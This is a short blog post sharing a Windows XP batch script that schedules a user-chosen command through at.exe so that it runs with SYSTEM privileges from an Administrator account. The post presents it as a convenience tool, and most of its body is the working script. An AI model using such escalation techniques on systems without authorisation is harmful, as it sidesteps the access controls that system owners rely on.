Administrator to System privilege escallation

Windows XP. There comes a time in every Windows users life when he wants more. Administrator access isn't enough. He wants to have the same level of access that the System has.

Maybe it's to kill a stubborn process which looks like a virus but actually turns out to be a critical System process, or maybe it's just so they can laugh maniacally.

Whatever the reason, I have created a script to give Administrator users SYSTEM level access to their Windows XP computers:


@echo off
echo.
at>nul
if "%errorlevel%"=="1" (
  echo You do not have sufficient priviliges to execute this command.
  echo You MUST be running as an administrator ^(with access to "at.exe"^).
  goto end
)
echo WARNING: This command will be executed with SYSTEM priviliges!
echo.
set /P cmd=Enter command to run (eg,"cmd", "taskmgr"): 

set rnd=r%random%n%random%d
echo.|time>%rnd%
set /P time=<%rnd%
del /F /Q %rnd%
for /F "usebackq tokens=5,6,7 delims=:. " %%i in ('%time%') do (
  set our=%%i
  set min=%%j
  set sec=%%k
)
set /A tot=%min%+1
set /A dif=60-%sec%
at %our%:%tot% /interactive %cmd% >nul
if "%errorlevel%"=="0" (
  echo The command will be executed in %dif% seconds.
) else (
  echo An unknown error has occured.
)

:end
echo Press any key to exit.
pause>nul
Save the code as a .bat file, and run!

This script uses the old at.exe trick to escalate your privs but it fills in the parameters automatically, so all you need to do is say what command you want to execute with your system privs.

PS: You DO need administrator access to run this script, so it's useless to most baddies. This is only useful if you want to increase from administrator to system.

No comments:

Post a Comment